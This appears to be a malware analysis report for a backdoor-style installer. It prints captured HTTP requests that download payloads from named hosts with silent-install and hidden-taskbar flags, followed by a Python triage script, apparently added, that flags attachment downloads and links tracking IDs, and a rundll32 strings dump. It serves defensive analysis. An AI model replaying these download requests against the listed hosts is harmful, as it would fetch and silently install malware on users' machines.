GET /?step_id=6&sf=1&installer_id=5459321632979031863&publisher_id=24406&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2310208155889048869&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=12802899647634509424&session_id=7757455632247121954&project_encode_id=24406&task_extension=1&payload_ver=dev&sr=0&enc_u_p=1&enc_u_p=1&st=0&IX_Startapp=1&pic_installer_ver=14&InstallerLink=0&SilentInstall=1&HideTaskbarIcon=1&AddToPayLoad=RunOnceMutex="alpha_installer"/n InstallerLink="0"&publisher_id=24406&download_id=2310208155889048869&installer_id=5459321632979031863&session_id=0&iid=5459321632979031863&did=2310208155889048869&installer_only=1&st=0&IX_Startapp=1&self_redirect=0 HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.storesis.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sat, 09 May 2015 23:06:52 GMT
Content-Type: text/html
Content-Length: 8562
Connection: close
Content-Disposition: attachment; filename="6.txt"
..T.m.U.x.B.Q.b.d.M.U.9.9.U.d.a.W.Y.S.0.N.h.g.U.y.G.X.P.a.Y.B.C.K.k.B./.U.z.e.X.S. .A.h.h.2.4.j.4.D.L.6.T.8.y.X.F.o.r.A.K.G.r.m.p.T.c.U.E.I.5.1.N.A.b.U.1.Z.7.q.4.2.a.n.I.v.l.9.C.4.a.O.m.D.F.2.y.O.G.y.A.H.P.C.g.U.S.i.f.R.V.j.y.v.A.z.o.e.1.r.v.k.N.a.9.c.3.W.B.C.P.h.E.J.l.U.b.n.a.d.H.h.z.9.t.P.H.h.f.g.G.f.5.G.H./.n.q.V.S.Q.p.N.k.p.B.z.r.W.J.e.K. .t.R.Q.a.e.T.6.q.r.E.W.S.p.O.X.X.Q.f.i.6.K.G.w.X.F.S.w.R.O.9.S.l.g.F.z.w.e./.G.s.o.b.v.l.P.b.O.u.j.N.a.V.A.a.s.H.V.F.b.n.2.i.x.9.n.q.S.c.v.X.h.Z.a.s.P.Y.K.f.e.z.q.d.w.T.r.F.u.n.z.1.x.8.P.D.3.L.I.y.s.0.u.k.r.t.c.H.v.9.S.b.V.z.g.6.M.K.P.O.K.c./.j.1.2.0.Q.c.Z.O.Z.w.Y.a.H.d.r.E.v.j.K.4.Q.E.Z.L.s.M.v.n.9.6.7.a.c.q.2.6./.S.f.R.v.q.5.T.5.D.u.P.R.d.x.V.w.1.9.x.w.c.C.z.4.W.B.a. .m.L.P.p.z.Y.i.L.q.g.e.D.b.q.r.v.t.w.3.s.9.F.T.i./.h.S. .V.2.U.2. ./.r.U.3.7.3.n.X.q.x.B.5.c.U.F.I.G.n.k.t.L.m.S.O.s.n.t./.P.B.8.e.K.b.c.2.y.9.H.c./.7.2.s. .c.2.f.T.L.t.N.v.c.J.7.M.a.y.g. .p.z.h.M.R.Z.n.o.v.o.W.C.v.h.d.B.J.B./.T.s.K.f.K.q./.5.8.u.V.x.1.X.O.m.I.r.T.h.b.U.C.1. .G.E.Y.H.6.7.6.p.M.S.G.t.C.5.y.u.W.X.w.Z.f.T.n. .A.6.r.H.w.v.o.O.m.D.K.j.7.u.3.a.1.k.2.U.t.y.r.b.G.f.u.a.r.g.i.1.e.2.r.r.r.E.n.V.r.c.W.8.c.W.p.f.o.q.l.p.G.d.k.E.M.Y.x.a.A.y.c.V.4.N.K.w.8.Q.M.v.f.X.C.8.j./.H./.N.Q.Z.i.u.0.t.a.W.m.c.j.g.w.j.m.q.5.8.i.k.z.l.4.1.K.s.0.f.k.b.N.5.v.b.i.z.G.t.I.L.j.I.Y.1.H.Y.y.8.7.A.J.h.U.q.J.N.T.B.C.q.d.o.b.5.l.K.u.N.y. .9.D.W.J.d.E.0.n.T.f.c.f.h.9.N.w.k.y.q.C.3.H.b.A.W.E.r.q.u.9.f.i.o.d.9.i.G.5.E.4.Z.M.k.t.z.c.A.r.O.Y.1.N.A.Z.n.h.p.J.W.i.d.6.f.F.y.X.8.x.P.f.O.6.B.p.g.d.7.A.f.1.r.C.z.m.v.u.U.m.g.j.P.M.3.n.J.O.
<<< skipped >>>
GET /?e=nnnbvv&publisher=&&dd=3&ind=5459321632979031863&exid=%UpdateInfo_ExternalID&bijo=1&ssd=7757455632247121954&hid=12802899647634509424&osid=501&sfx=2&jc=1&cha=0 HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: storestral.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sat, 09 May 2015 23:06:34 GMT
Content-Type: application/octet-stream
Content-Length: 1962996
Connection: close
Content-Disposition: attachment; filename="xoL9D9NSNKXd4Z.ca"
Content-Transfer-Encoding: binary
Access-Control-Allow-Origin: *
..z......A3.....U........;...;.......Y..........[..\..>o.%:..(......S[..... ...qD.D...}M.;t..n(.....P\..=..,E..=l.3G..1f..... u..L...u.....SI..<a..w..73.=... d..T...q..4...E...n..I..k*..^..9|..J..]:..'...R...d.K`...T..V..9b..j...k..2..)P..!c..A..#M.T....s..Q..-\..l..bU..&s..D.."m.E...?y..J..$}..4.. k...S..\.."m.*U.. d..]...h..#...O...x.Ua..3d..T...%..2..?{..)..%d..j6.BJ..11..Q..<q......~.."..YE..}".%F..#|..\..5}..\..BS..,...C..;;..P..?z.VU..cY..m...k..,..-X..=t.3G..1f.....1~..Y..?j..{...N..)l..Z..>a..D..4 ..c...v..!..5*...o."d..r...C..4|..L..B*..u..X....a..O..)F..U...`......w..#...M..jB..g..9F..\..*|..2...h..9...E...r.?_...O..u..4i..h...q..%..J...:o..K...5......S..{..&!..t..]....D.E...i<.M....m..c...v..!...R...i..}..m*..D..w?..L...}.."...N..gu..F..1d.W...kx..A...u../...I...H.&}..=`./T...5..O..8V..t.......%.2L..>y.-s..`D..`..:n..9..=z...o.(\...`. t..hh..^..4O..y..1...}l.EP..gz..c..l~..{../,..9...g...3..]..u:.3g../~..V..U ..e..,G...J.E~...\.:@...Z.....S~.....0J...a.!b...Y..w..ie..{..:~.....[H..14.8j..u:.:e...@..]..&!..7...X...%.6k..$f.:G..o~..z...p..q..QD..<1.D_...0..... f..y..7u..x...s...q.=j...r..X..>c..[..2J..s..\X..zF.$@...1.]....V..S..8R.....,c...e.2k..`x.JW.. ..l..%I..:..M...'k.AZ..4_.LA..RK..\..2}..2..bI..<a..M..9l.Z...a#.....Y/..s..^...;e..A...a.E...m'.....R*..q..Q...Be..M..9g.'Y..z!......}..)..U...Bi..\..<W..@..z#..J...k..2...T..j2.A...e%.A...b .....jC......I..Bu..I.."k..V..e2..`..6V..(...u...O......J.3I..s"..H..#N.....0N..&w..k...d..R..)w..o..3O.....^...%/..c..aA..}..0A..|
<<< skipped >>>
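The six exchanges above are the page's own capture. The script below is an added example and not part of the Lavasoft report: it parses such a flattened request/response dump, flags every response delivered as a file attachment (the c1.storesis.com reply is served as text/html but still carries an attachment disposition), and correlates the ind/hid/ssd values, which the c1.storesis.com request sends as installer_id, hardware_id and session_id, across the hosts that received them. The sample transcript is constructed from the capture above, abridged (first query blob shortened, loveshero.net exchange omitted, bodies trimmed); the helper names and the state-machine parser are the example's own, not anything from the report or the malware.

```python
"""Triage of the HTTP transcript above (added example, not part of the Lavasoft
report): parse request/response pairs, flag responses served as file attachments,
and correlate the tracking IDs the installer repeats to every host."""
import re
from urllib.parse import parse_qs, urlsplit

UA_OLD = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7"
UA_NEW = "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
# Constructed sample: the page's capture abridged to the lines inspected here
# (first query blob shortened, loveshero.net exchange dropped, bodies trimmed).
SAMPLE = f"""GET /hp/?q=XDOtvcE HTTP/1.1
User-Agent: {UA_NEW}
Host: linq-goody-best.xyz
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Disposition: attachment; filename*=utf-8''download.exe; filename="download.exe"
POST / HTTP/1.1
User-Agent: {UA_OLD}
Host: r1.mytholiday.com
data=39ZH7x&report=QH8R3f
HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
{{}}
GET /?e=whcop&sfx=2&cht=0&publisher=&ind=5459321632979031863&exid=0&ssd=7757455632247121954&hid=12802899647634509424&osid=501&fc=1&jc=1&cha=0 HTTP/1.1
User-Agent: {UA_OLD}
Host: goldavid.com
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Disposition: attachment; filename="9Bgp6JPux0JTfR.ca"
GET /?step_id=6&installer_id=5459321632979031863&publisher_id=24406&country_code=UA&installer_type=IX_2013&hardware_id=12802899647634509424&session_id=7757455632247121954&SilentInstall=1&AddToPayLoad=RunOnceMutex="alpha_installer"/n InstallerLink="0"&session_id=0&iid=5459321632979031863 HTTP/1.1
User-Agent: {UA_OLD}
Host: c1.storesis.com
HTTP/1.1 200 OK
Content-Type: text/html
Content-Disposition: attachment; filename="6.txt"
GET /?e=nnnbvv&publisher=&&dd=3&ind=5459321632979031863&exid=%UpdateInfo_ExternalID&bijo=1&ssd=7757455632247121954&hid=12802899647634509424&osid=501&sfx=2&jc=1&cha=0 HTTP/1.1
User-Agent: {UA_OLD}
Host: storestral.com
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Disposition: attachment; filename="xoL9D9NSNKXd4Z.ca"
"""

# The storesis query carries raw spaces, so the path is everything before the version.
REQ_RE = re.compile(r"^(GET|POST|HEAD) (.+) HTTP/1\.[01]$")
STATUS_RE = re.compile(r"^HTTP/1\.[01] (\d{3})")
HDR_RE = re.compile(r"^([A-Za-z][\w-]*): (.*)$")
FNAME_RE = re.compile(r"""filename\*?=(?:utf-8'')?"?([^";]+)""")
# The same three identifiers travel under different names to different hosts.
ID_KEYS = ("ind", "installer_id", "iid", "hid", "hardware_id", "ssd", "session_id")


def parse_transcript(text):
    """Split a flattened dump into exchanges with request/response header dicts."""
    exchanges, cur, state = [], None, None
    for line in text.splitlines():
        if m := REQ_RE.match(line):
            cur = {"method": m.group(1), "path": m.group(2), "req": {}, "resp": {}, "status": None}
            exchanges.append(cur)
            state = "req"
        elif (m := STATUS_RE.match(line)) and cur is not None:
            cur["status"], state = int(m.group(1)), "resp"
        elif (m := HDR_RE.match(line)) and state:
            cur[state][m.group(1).lower()] = m.group(2)
        else:
            state = None  # body line: ignore until the next request or status line
    for ex in exchanges:
        ex["host"] = ex["req"].get("host", "")
        ex["params"] = parse_qs(urlsplit(ex["path"]).query)
    return exchanges


def flag_downloads(exchanges):
    """(host, filename, content_type) for every response delivered as an attachment."""
    found = []
    for ex in exchanges:
        cd, ct = ex["resp"].get("content-disposition", ""), ex["resp"].get("content-type", "")
        if "attachment" in cd or ct.startswith("application/octet-stream"):
            m = FNAME_RE.search(cd)
            found.append((ex["host"], m.group(1) if m else None, ct))
    return found


def shared_identifiers(exchanges):
    """Tracking-ID values that reached more than one host, mapped to those hosts."""
    seen = {}
    for ex in exchanges:
        for key in ID_KEYS:
            for val in ex["params"].get(key, []):
                if val != "0":  # the storesis request also sends session_id=0
                    seen.setdefault(val, set()).add(ex["host"])
    return {v: h for v, h in seen.items() if len(h) > 1}


if __name__ == "__main__":
    exs = parse_transcript(SAMPLE)
    for host, fname, ct in flag_downloads(exs):
        print(f"attachment from {host}: {fname} ({ct})")
    for val, hosts in shared_identifiers(exs).items():
        print(f"id {val} reached {len(hosts)} hosts: {sorted(hosts)}")
```

Run as a script it prints the four attachment downloads and the three identifiers shared by goldavid.com, c1.storesis.com and storestral.com (loveshero.net receives the same three in the full capture). Two things the output makes visible that the raw dump hides: the hardware, installer and session identifiers are a usable pivot across the affiliate hosts regardless of the parameter name each host expects, and the requests carry two different spoofed Chrome User-Agent strings (Chrome/36 for the linq-goody-best.xyz fetch, Chrome/16 for the rest), both claiming Windows NT 6.2/6.3 while the rundll32.exe strings dump below shows the host is Windows XP (5.1.2600). The body served as 6.txt with Content-Type text/html appears to be UTF-16LE text rather than HTML: the interleaved dots in the dump are its zero bytes.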
Map
The Backdoor connects to the servers at the following location(s):
Strings from Dumps
rundll32.exe_1432:
(The strings below are those of the stock Windows XP rundll32.exe image itself, version 5.1.2600.5512, including its rundll32.pdb path and its error-message resources; no strings from the DLL it was asked to load appear in this dump.)
.text
`.data
.rsrc
msvcrt.dll
KERNEL32.dll
NTDLL.DLL
GDI32.dll
USER32.dll
IMAGEHLP.dll
rundll32.pdb
.....eZXnnnnnnnnnnnn3
....eDXnnnnnnnnnnnn3
...eDXnnnnnnnnnnnn,
.eDXnnnnnnnnnnnn,
%Xnnnnnnnnnnnnnnn1
O3$dS7"%U9
.manifest
5.1.2600.5512 (xpsp.080413-2105)
RUNDLL.EXE
Windows
Operating System
5.1.2600.5512
YThere is not enough memory to run the file %s.
Please close other windows and try again.
9The file %s or one of its components could not be opened.
0The file %s or one of its components cannot run.
MThe file %s or one of its components requires a different version of Windows.
UThe file %s or one of its components cannot run in standard or enhanced mode Windows.
3Another instance of the file %s is already running.
/An exception occurred while trying to run "%s"
Error in %s
Missing entry:%s
Error loading %s